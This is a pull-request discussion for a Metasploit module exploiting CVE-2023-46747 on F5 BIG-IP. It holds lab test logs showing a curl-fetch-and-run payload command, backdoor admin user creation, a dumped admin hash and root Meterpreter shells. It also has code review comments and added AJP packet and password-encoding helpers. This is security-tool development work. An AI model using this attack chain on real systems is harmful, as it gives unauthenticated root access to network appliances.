Add Exploit For CVE-2023-46747 (F5 TMUI AJP Smuggling RCE) #18497
Conversation
Looking great so far. I know things are going to change, so I didn't review too thoroughly; I just added one suggestion to make things run smoothly.
- BIGIP 16.1.2.1.-0.0.10-ALL-vmware (vulnerable target)
The module runs as expected and returns a root shell
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > run
[*] Command to run on remote host: curl -so /tmp/nUILTAOc http://192.168.123.1:8080/iWIVXt4sBwzVNa28qZFpsw; chmod +x /tmp/nUILTAOc; /tmp/nUILTAOc &
[*] Fetch Handler listening on 192.168.123.1:8080
[*] HTTP server started
[*] Adding resource /iWIVXt4sBwzVNa28qZFpsw
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] exploiting
[*] Sleeping for 2 seconds before attempting again
[+] Created administrator user: ahpYG:t4Sock4v2lCW
[*] Obtained login token: E5XEEVXNZMVFYPGRITLHXBJBPH
[*] Client 192.168.123.226 requested /iWIVXt4sBwzVNa28qZFpsw
[*] Sending payload to 192.168.123.226 (curl/7.47.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.123.226
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.226:58524) at 2023-10-31 12:36:41 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.3.1611 (Linux 3.10.0-862.14.4.el7.ve.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
- BIGIP 16.0.1-0.0.3.ALL-vmware (not vulnerable)
Affected versions in the 16.x range are: 16.1.0 - 16.1.4
I set up a patched target and figured I'd include the test results. Not sure how you plan on writing the check method; if version info isn't readily available, this might be useful:
...
####################
# Request:
####################
PATCH /mgmt/shared/authz/users/epmEw HTTP/1.1
Host: 192.168.123.225
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Authorization: Basic ZXBtRXc6OGZYYVFqR3FOTmVt
Content-Type: application/json
Content-Length: 56
{"oldPassword":"8fXaQjGqNNem","password":"yAacbYs9nwDH"}
####################
# Response:
####################
HTTP/1.1 401 F5 Authorization Required
Date: Tue, 31 Oct 2023 16:06:07 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=16070400; includeSubDomains
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[*] Final attempt. Sleeping for the remaining 8 seconds out of total timeout 30
[-] Exploit aborted due to failure: unexpected-reply: Failed to change the password.
[*] Exploit completed, but no session was created.
Great changes, looking good. First try retesting the module I got a root session with no issues.
msf6 > use f5_bigip_tmui_rce_cve_2023_46747
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set rhosts 192.168.123.226
rhosts => 192.168.123.226
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set fetch_srvhost 192.168.123.1
fetch_srvhost => 192.168.123.1
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > options
Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.123.226 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME DDzvzHPl no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST 192.168.123.1 no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > run
[*] Started reverse TCP handler on 192.168.123.1:4444
[+] Admin user was created successfully. Credentials: XcHlOk - BPCJMuhJ9qRfu
[+] Retrieved the admin hash: $6$NXLmNels$bY88mPCfukgSQgUvUW.fiMla5o2K1/E02cONCZkP1nTUmftSkXI5lmj/rI4QccOkflWWKIOWFtn/n836hl4S00
[*] Obtained login token: U336NG3S7AHVJFEA2CHKTS5WEZ
[*] Sending stage (3045380 bytes) to 192.168.123.226
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.226:49036) at 2023-11-01 20:11:13 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.3.1611 (Linux 3.10.0-862.14.4.el7.ve.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.123.226 - Meterpreter session 1 closed. Reason: Died
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.123.226:443 - The target is vulnerable.
@@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Exploit::CmdStager | |||
include Msf::Exploit::FileDropper | |||
include Msf::Exploit::Deprecated | |||
moved_from 'exploit/linux/http/f5_bigip_tmui_rce' |
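Review bot: `moved_from 'exploit/linux/http/f5_bigip_tmui_rce'` makes the old module path an alias for this CVE-2023-46747 module, yet the PR description says that path belonged to the CVE-2020-5902 module, which is being renamed to f5_bigip_tmui_rce_cve_2020_5902. Anyone invoking the old name from a script or runbook will now fire a different exploit against a different vulnerability than before. Consider attaching the `moved_from` to the renamed CVE-2020-5902 module instead, or state in the description why the alias should resolve to this module.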
👍
require 'bindata'

# @see: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
Not a blocker; Potentially putting a waybackmachine link here would help future travellers 👀
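For readers following the @see link, here is an added illustration of the AJPv13 "Forward Request" packet that spec describes. It was written for this page from the spec and is not code from the Metasploit module (which builds its packets with bindata); it uses only String#pack/unpack and StringIO, and the sample request values in the usage note are constructed.

```ruby
# Added illustration of the AJPv13 "Forward Request" packet that the @see link
# documents, written from the spec for this page. Not code from the Metasploit
# module (which uses bindata); only String#pack/unpack and StringIO are used.
require 'stringio'

AJP_MAGIC = "\x12\x34".b            # client -> container packets start with 0x1234
JK_AJP13_FORWARD_REQUEST = 2
AJP_TERMINATOR = 0xFF               # ends the attribute list
ATTR_QUERY_STRING = 0x05
ATTR_REQ_ATTRIBUTE = 0x0A
AJP_METHODS = { 'OPTIONS' => 1, 'GET' => 2, 'HEAD' => 3, 'POST' => 4,
                'PUT' => 5, 'DELETE' => 6, 'TRACE' => 7 }.freeze
# Well-known header names travel as a 2-byte 0xA0xx code instead of a string.
AJP_HEADER_CODES = {
  'accept' => 0xA001, 'accept-charset' => 0xA002, 'accept-encoding' => 0xA003,
  'accept-language' => 0xA004, 'authorization' => 0xA005, 'connection' => 0xA006,
  'content-type' => 0xA007, 'content-length' => 0xA008, 'cookie' => 0xA009,
  'cookie2' => 0xA00A, 'host' => 0xA00B, 'pragma' => 0xA00C,
  'referer' => 0xA00D, 'user-agent' => 0xA00E
}.freeze

# AJP string: 2-byte big-endian length, the bytes, then a NUL that the length
# does not count. nil is the "null string": length 0xFFFF and no data.
def ajp_string(s)
  return [0xFFFF].pack('n') if s.nil?
  [s.bytesize].pack('n') + s.b + "\x00".b
end

# Build a complete packet: magic, body length, then the forward-request body.
def ajp_forward_request(method:, uri:, headers: {}, attributes: {},
                        remote_addr: '127.0.0.1', server_name: 'localhost',
                        server_port: 80, is_ssl: false, protocol: 'HTTP/1.1')
  body = [JK_AJP13_FORWARD_REQUEST, AJP_METHODS.fetch(method.upcase)].pack('CC')
  body << ajp_string(protocol) << ajp_string(uri) << ajp_string(remote_addr)
  body << ajp_string(nil) << ajp_string(server_name) # remote_host left null
  body << [server_port].pack('n') << [is_ssl ? 1 : 0].pack('C')
  body << [headers.size].pack('n')
  headers.each do |name, value|
    code = AJP_HEADER_CODES[name.downcase]
    body << (code ? [code].pack('n') : ajp_string(name)) << ajp_string(value.to_s)
  end
  # query_string has its own code; anything else is a generic req_attribute pair.
  attributes.each do |name, value|
    if name == :query_string
      body << [ATTR_QUERY_STRING].pack('C') << ajp_string(value)
    else
      body << [ATTR_REQ_ATTRIBUTE].pack('C') << ajp_string(name.to_s) << ajp_string(value.to_s)
    end
  end
  body << [AJP_TERMINATOR].pack('C')
  AJP_MAGIC + [body.bytesize].pack('n') + body
end

# Read one AJP string from a StringIO positioned at its length field.
def ajp_read_string(io)
  len = io.read(2).unpack1('n')
  return nil if len == 0xFFFF
  s = io.read(len)
  io.getbyte # consume the trailing NUL
  s.force_encoding(Encoding::UTF_8)
end

# Parse a Forward Request back into a hash, raising on anything malformed.
def parse_ajp_forward_request(packet)
  raise 'bad AJP magic' unless packet.byteslice(0, 2) == AJP_MAGIC
  length = packet.byteslice(2, 2).unpack1('n')
  raise 'length field does not match packet size' unless packet.bytesize == length + 4
  io = StringIO.new(packet.byteslice(4, length))
  raise 'not a forward request' unless io.getbyte == JK_AJP13_FORWARD_REQUEST
  req = { method: AJP_METHODS.key(io.getbyte) }
  %i[protocol uri remote_addr remote_host server_name].each { |k| req[k] = ajp_read_string(io) }
  req[:server_port] = io.read(2).unpack1('n')
  req[:is_ssl] = io.getbyte == 1
  req[:headers] = {}
  io.read(2).unpack1('n').times do
    coded = io.string.getbyte(io.pos) == 0xA0 # 0xA0xx header code vs. string name
    name = coded ? AJP_HEADER_CODES.key(io.read(2).unpack1('n')) : ajp_read_string(io)
    req[:headers][name] = ajp_read_string(io)
  end
  req[:attributes] = {}
  loop do
    code = io.getbyte
    raise 'truncated body' if code.nil?
    break if code == AJP_TERMINATOR
    case code
    when ATTR_QUERY_STRING then req[:attributes][:query_string] = ajp_read_string(io)
    when ATTR_REQ_ATTRIBUTE
      name = ajp_read_string(io)
      req[:attributes][name] = ajp_read_string(io)
    else raise format('unsupported attribute code 0x%02x', code)
    end
  end
  req
end
```

Usage: `ajp_forward_request(method: 'GET', uri: '/index.jsp', headers: { 'Host' => 'bigip.test' })` yields the bytes a connector would hand to the container, and `parse_ajp_forward_request` decodes them again, so a round trip is a quick check that a hand-built packet is well formed. The parser deliberately refuses unknown attribute codes and a length field that disagrees with the packet size rather than guessing, which is the behaviour you want when inspecting captured traffic.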
end

def check
  res = create_user(role: 'Guest')
Not a blocker, I don't think this warrants requiring a defanged mode, as it's going to create a user and leave it behind as a worst-case scenario, which won't break any environments.
end

def password
  @password ||= Rex::Text.rand_text_alphanumeric(12..14)
Not a hard blocker, is it possible to use special characters here?
I increased the size from 12..14 to 16..20. Special characters are a bit more complicated. After checking URI.encode_www_form, I only found two characters, . and *, that do not get expanded to 3 characters. Because of the expansion, it's harder to guarantee that the password will fit within the allotted space.
[3] pry(#<Msf::Modules::Exploit__Linux__Http__F5_bigip_tmui_rce_cve_2023_46747::MetasploitModule>)> URI.encode_www_form('password' => 'FoO!@#$%^&*()~`{}|[]\:";<>?,./')
=> "password=FoO%21%40%23%24%25%5E%26*%28%29%7E%60%7B%7D%7C%5B%5D%5C%3A%22%3B%3C%3E%3F%2C.%2F"
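As an added illustration of the length constraint described in the comment above, the following is not code from the module or its author. It measures how much a candidate password grows under URI.encode_www_form, checks it against a byte budget, and generates passwords that include punctuation yet never expand on the wire. SecureRandom stands in for Rex::Text so the snippet runs outside the framework (an assumption, as is the field name 'password').

```ruby
# Added example, not part of the Metasploit module. Shows which characters
# survive URI.encode_www_form unchanged and how to size a password to a
# form-field byte budget. SecureRandom is used instead of Rex::Text (assumption).
require 'uri'
require 'securerandom'

# Characters URI.encode_www_form_component passes through unchanged:
# A-Z a-z 0-9 and the four punctuation marks * - . _ . Space becomes '+';
# every other byte becomes %XX and therefore triples in size.
FORM_SAFE_PUNCT = %w[* - . _].freeze
FORM_SAFE_CHARS = (('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a +
                   FORM_SAFE_PUNCT).freeze

# Bytes that +value+ occupies on the wire once sent as form field +key+
# (the key is assumed to contain no characters that need encoding).
def encoded_value_length(value, key: 'password')
  URI.encode_www_form(key => value).bytesize - key.bytesize - 1 # drop "key="
end

# How many bytes the encoding adds over the raw password.
def encoding_overhead(value)
  encoded_value_length(value) - value.bytesize
end

# True when the encoded form of +value+ fits in a field limited to +max_bytes+.
def fits_form_budget?(value, max_bytes)
  encoded_value_length(value) <= max_bytes
end

# Random password of exactly +length+ characters that mixes letters, digits and
# punctuation but never grows when form-encoded, so its raw length is its
# wire length and the budget check above is trivially satisfied.
def form_safe_password(length)
  raise ArgumentError, 'length must be at least 3' if length < 3
  groups = [('A'..'Z').to_a + ('a'..'z').to_a, ('0'..'9').to_a, FORM_SAFE_PUNCT]
  chars = groups.map { |g| g[SecureRandom.random_number(g.size)] } # one of each
  (length - chars.size).times do
    chars << FORM_SAFE_CHARS[SecureRandom.random_number(FORM_SAFE_CHARS.size)]
  end
  chars.shuffle(random: SecureRandom).join
end
```

Running encoded_value_length on the 30-character string from the pry session above returns 80: the 25 expanded characters cost three bytes each while F, o, O, * and . cost one. Restricting punctuation to the four pass-through characters is what lets a fixed-length password be generated without re-checking its encoded size after every draw.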
The module is generally reliable, but may fail after it's been run multiple times.
Awesome job! Final testing output:
🚢 🚢 🚢
Release Notes
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to execute a command payload. After the module is done, the new admin account is deleted. The standard REST APIs prevent a user from deleting themselves, so the module leverages the vulnerability a second time to delete them while impersonating the admin user.
The existing exploit/linux/http/f5_bigip_tmui_rce module was renamed to exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902 to clearly differentiate it from this module. There appears to be a precedent in the adjacent F5 modules to append the CVE to the end of the module name to clarify which vulnerability is being exploited.
The AutoCheck mixin was not used because the check method creates a guest user, and when the AutoCheck mixin was present this would break the exploit logic because the user didn't have the necessary privileges to execute the payload. If the check method created an Administrative user, then the AutoCheck mixin could be used. As it is now, there isn't an obvious way to have the check method create an Administrative user but only when called in the context of the exploit process. Accounting for the ForceExploit and AutoCheck methods would just complicate things.
Testing
- admin hash was saved to the database
Example